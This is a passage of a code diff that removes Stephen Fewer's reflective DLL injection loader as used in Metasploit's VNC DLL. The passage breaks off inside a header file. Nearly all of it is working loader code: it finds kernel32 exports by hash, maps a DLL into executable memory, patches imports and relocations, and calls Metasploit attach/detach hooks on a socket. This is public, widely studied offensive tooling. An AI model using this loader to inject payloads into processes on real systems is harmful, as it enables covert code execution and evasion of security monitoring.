// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
|
|
||||||
// we declare some common stuff in here...
|
|
||||||
|
|
||||||
#define DLL_METASPLOIT_ATTACH 4
|
|
||||||
#define DLL_METASPLOIT_DETACH 5
|
|
||||||
#define DLL_QUERY_HMODULE 6
|
|
||||||
|
|
||||||
#define DEREF( name )*(UINT_PTR *)(name)
|
|
||||||
#define DEREF_64( name )*(DWORD64 *)(name)
|
|
||||||
#define DEREF_32( name )*(DWORD *)(name)
|
|
||||||
#define DEREF_16( name )*(WORD *)(name)
|
|
||||||
#define DEREF_8( name )*(BYTE *)(name)
|
|
||||||
|
|
||||||
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
|
|
||||||
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
|
|
||||||
|
|
||||||
#define DLLEXPORT __declspec( dllexport )
|
|
||||||
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,457 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#include "ReflectiveLoader.h"
|
|
||||||
//===============================================================================================//
|
|
||||||
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
|
|
||||||
HINSTANCE hAppInstance = NULL;
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifdef _WIN64
|
|
||||||
#pragma intrinsic( _ReturnAddress )
|
|
||||||
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
||||||
|
|
||||||
/*
|
|
||||||
* Use Reflective DLL Injection.
|
|
||||||
*/
|
|
||||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
|
|
||||||
// otherwise the DllMain at the end of this file will be used.
|
|
||||||
|
|
||||||
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
|
|
||||||
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
|
|
||||||
|
|
||||||
// This is our position independent reflective DLL loader/injector
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
|
|
||||||
#else
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
|
|
||||||
#endif
|
|
||||||
{
|
|
||||||
// the functions we need
|
|
||||||
LOADLIBRARYA pLoadLibraryA;
|
|
||||||
GETPROCADDRESS pGetProcAddress;
|
|
||||||
VIRTUALALLOC pVirtualAlloc;
|
|
||||||
USHORT usCounter;
|
|
||||||
|
|
||||||
// the initial location of this image in memory
|
|
||||||
UINT_PTR uiLibraryAddress;
|
|
||||||
// the kernels base address and later this images newly loaded base address
|
|
||||||
UINT_PTR uiBaseAddress;
|
|
||||||
|
|
||||||
// variables for processing the kernels export table
|
|
||||||
UINT_PTR uiAddressArray;
|
|
||||||
UINT_PTR uiNameArray;
|
|
||||||
UINT_PTR uiExportDir;
|
|
||||||
UINT_PTR uiNameOrdinals;
|
|
||||||
DWORD dwHashValue;
|
|
||||||
|
|
||||||
// variables for loading this image
|
|
||||||
UINT_PTR uiHeaderValue;
|
|
||||||
UINT_PTR uiValueA;
|
|
||||||
UINT_PTR uiValueB;
|
|
||||||
UINT_PTR uiValueC;
|
|
||||||
UINT_PTR uiValueD;
|
|
||||||
|
|
||||||
// STEP 0: calculate our images current base address
|
|
||||||
|
|
||||||
// we will start searching backwards from our current EIP
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiLibraryAddress = eip();
|
|
||||||
#else
|
|
||||||
__asm call geteip
|
|
||||||
__asm geteip: pop uiLibraryAddress
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// loop through memory backwards searching for our images base address
|
|
||||||
// we dont need SEH style search as we shouldnt generate any access violations with this
|
|
||||||
while( TRUE )
|
|
||||||
{
|
|
||||||
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
|
|
||||||
{
|
|
||||||
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
|
|
||||||
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
|
|
||||||
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
|
|
||||||
{
|
|
||||||
uiHeaderValue += uiLibraryAddress;
|
|
||||||
// break if we have found a valid MZ/PE header
|
|
||||||
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
uiLibraryAddress--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 1: process the kernels exports for the functions our loader needs...
|
|
||||||
|
|
||||||
// get the Process Enviroment Block
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiBaseAddress = __readgsqword( 0x60 );
|
|
||||||
#else
|
|
||||||
uiBaseAddress = __readfsdword( 0x30 );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
|
|
||||||
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
|
|
||||||
|
|
||||||
// get the first entry of the InMemoryOrder module list
|
|
||||||
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
|
|
||||||
while( uiValueA )
|
|
||||||
{
|
|
||||||
// get pointer to current modules name (unicode string)
|
|
||||||
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
|
|
||||||
// set bCounter to the length for the loop
|
|
||||||
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
|
|
||||||
// clear uiValueC which will store the hash of the module name
|
|
||||||
uiValueC = 0;
|
|
||||||
// compute the hash of the module name...
|
|
||||||
do
|
|
||||||
{
|
|
||||||
uiValueC = ror( (DWORD)uiValueC );
|
|
||||||
// normalize to uppercase if the madule name is in lowercase
|
|
||||||
if( *((BYTE *)uiValueB) >= 'a' )
|
|
||||||
uiValueC += *((BYTE *)uiValueB) - 0x20;
|
|
||||||
else
|
|
||||||
uiValueC += *((BYTE *)uiValueB);
|
|
||||||
uiValueB++;
|
|
||||||
} while( --usCounter );
|
|
||||||
// compare the hash with that of kernel32.dll
|
|
||||||
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
|
|
||||||
{
|
|
||||||
// get this modules base address
|
|
||||||
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
// get the next entry
|
|
||||||
uiValueA = DEREF( uiValueA );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of name pointers
|
|
||||||
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
|
|
||||||
|
|
||||||
// get the VA for the array of name ordinals
|
|
||||||
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
|
|
||||||
|
|
||||||
usCounter = 3;
|
|
||||||
|
|
||||||
// loop while we still have imports to find
|
|
||||||
while( usCounter > 0 )
|
|
||||||
{
|
|
||||||
// compute the hash values for this function name
|
|
||||||
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
|
||||||
|
|
||||||
// if we have found a function we want we get its virtual address
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
{
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use this functions name ordinal as an index into the array of name pointers
|
|
||||||
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// store this functions VA
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH )
|
|
||||||
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == GETPROCADDRESS_HASH )
|
|
||||||
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
|
|
||||||
// decrement our counter
|
|
||||||
usCounter--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next exported function name
|
|
||||||
uiNameArray += sizeof(DWORD);
|
|
||||||
|
|
||||||
// get the next exported function name ordinal
|
|
||||||
uiNameOrdinals += sizeof(WORD);
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 2: load our image into a new permanent location in memory...
|
|
||||||
|
|
||||||
// get the VA of the NT Header for the PE to be loaded
|
|
||||||
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
|
|
||||||
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
|
|
||||||
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
|
||||||
|
|
||||||
// we must now copy over the headers
|
|
||||||
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
|
|
||||||
uiValueB = uiLibraryAddress;
|
|
||||||
uiValueC = uiBaseAddress;
|
|
||||||
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
|
|
||||||
|
|
||||||
// STEP 3: load in all of our sections...
|
|
||||||
|
|
||||||
// uiValueA = the VA of the first section
|
|
||||||
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
|
|
||||||
|
|
||||||
// itterate through all sections, loading them into memory.
|
|
||||||
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
|
|
||||||
{
|
|
||||||
// uiValueB is the VA for this section
|
|
||||||
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueC if the VA for this sections data
|
|
||||||
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
|
|
||||||
|
|
||||||
// copy the section over
|
|
||||||
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
|
|
||||||
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
|
|
||||||
|
|
||||||
// get the VA of the next section
|
|
||||||
uiValueA += sizeof( IMAGE_SECTION_HEADER );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 4: process our images import table...
|
|
||||||
|
|
||||||
// uiValueB = the address of the import directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
|
|
||||||
|
|
||||||
// we assume their is an import table to process
|
|
||||||
// uiValueC is the first entry in the import table
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all imports
|
|
||||||
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
|
|
||||||
{
|
|
||||||
// use LoadLibraryA to load the imported module into memory
|
|
||||||
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
|
|
||||||
|
|
||||||
// uiValueD = VA of the OriginalFirstThunk
|
|
||||||
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
|
|
||||||
|
|
||||||
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
|
|
||||||
|
|
||||||
// itterate through all imported functions, importing by ordinal if no name present
|
|
||||||
while( DEREF(uiValueA) )
|
|
||||||
{
|
|
||||||
// sanity check uiValueD as some compilers only import by FirstThunk
|
|
||||||
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
|
|
||||||
{
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use the import ordinal (- export ordinal base) as an index into the array of addresses
|
|
||||||
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
// get the VA of this functions import by name struct
|
|
||||||
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
|
|
||||||
|
|
||||||
// use GetProcAddress and patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
|
|
||||||
}
|
|
||||||
// get the next imported function
|
|
||||||
uiValueA += sizeof( UINT_PTR );
|
|
||||||
if( uiValueD )
|
|
||||||
uiValueD += sizeof( UINT_PTR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next import
|
|
||||||
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 5: process all of our images relocations...
|
|
||||||
|
|
||||||
// calculate the base address delta and perform relocations (even if we load at desired image base)
|
|
||||||
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
|
|
||||||
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
|
|
||||||
|
|
||||||
// check if their are any relocations present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// and we itterate through all entries...
|
|
||||||
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
|
|
||||||
{
|
|
||||||
// uiValueA = the VA for this relocation block
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueB = number of entries in this relocation block
|
|
||||||
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
|
|
||||||
|
|
||||||
// uiValueD is now the first entry in the current relocation block
|
|
||||||
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
|
|
||||||
|
|
||||||
// we itterate through all the entries in the current block...
|
|
||||||
while( uiValueB-- )
|
|
||||||
{
|
|
||||||
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
|
|
||||||
// we dont use a switch statement to avoid the compiler building a jump table
|
|
||||||
// which would not be very position independent!
|
|
||||||
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
|
|
||||||
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
|
|
||||||
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
|
|
||||||
|
|
||||||
// get the next entry in the current relocation block
|
|
||||||
uiValueD += sizeof( IMAGE_RELOC );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next entry in the relocation directory
|
|
||||||
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
|
|
||||||
/*
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
|
|
||||||
// check if their are any exception etries present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// get the number of entries
|
|
||||||
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
|
|
||||||
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all entries
|
|
||||||
while( uiValueA-- )
|
|
||||||
{
|
|
||||||
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
|
|
||||||
|
|
||||||
// get the next entry
|
|
||||||
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
}
|
|
||||||
}
|
|
||||||
*/
|
|
||||||
// STEP 7: call our images entry point
|
|
||||||
|
|
||||||
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
|
|
||||||
|
|
||||||
// call our respective entry point, fudging our hInstance value
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
|
|
||||||
#else
|
|
||||||
// if we are injecting an DLL via a stub we call DllMain with no parameter
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
|
|
||||||
return uiValueA;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// you must implement this function...
|
|
||||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
|
||||||
|
|
||||||
BOOL MetasploitDllAttach( SOCKET socket )
|
|
||||||
{
|
|
||||||
Init( socket );
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
|
||||||
{
|
|
||||||
switch( dwExitFunc )
|
|
||||||
{
|
|
||||||
case EXITFUNC_SEH:
|
|
||||||
SetUnhandledExceptionFilter( NULL );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_THREAD:
|
|
||||||
ExitThread( 0 );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_PROCESS:
|
|
||||||
ExitProcess( 0 );
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
|
||||||
{
|
|
||||||
BOOL bReturnValue = TRUE;
|
|
||||||
switch( dwReason )
|
|
||||||
{
|
|
||||||
case DLL_METASPLOIT_ATTACH:
|
|
||||||
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_METASPLOIT_DETACH:
|
|
||||||
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_QUERY_HMODULE:
|
|
||||||
if( lpReserved != NULL )
|
|
||||||
*(HMODULE *)lpReserved = hAppInstance;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_ATTACH:
|
|
||||||
hAppInstance = hinstDLL;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_DETACH:
|
|
||||||
case DLL_THREAD_ATTACH:
|
|
||||||
case DLL_THREAD_DETACH:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
return bReturnValue;
|
|
||||||
}
|
|
||||||
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,197 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
#include <Winsock2.h>
|
|
||||||
#include <intrin.h>
|
|
||||||
|
|
||||||
#include "ReflectiveDLLInjection.h"
|
|
||||||
|
|
||||||
#define EXITFUNC_SEH 0xEA320EFE
|
|
||||||
#define EXITFUNC_THREAD 0x0A2A1DE0
|
|
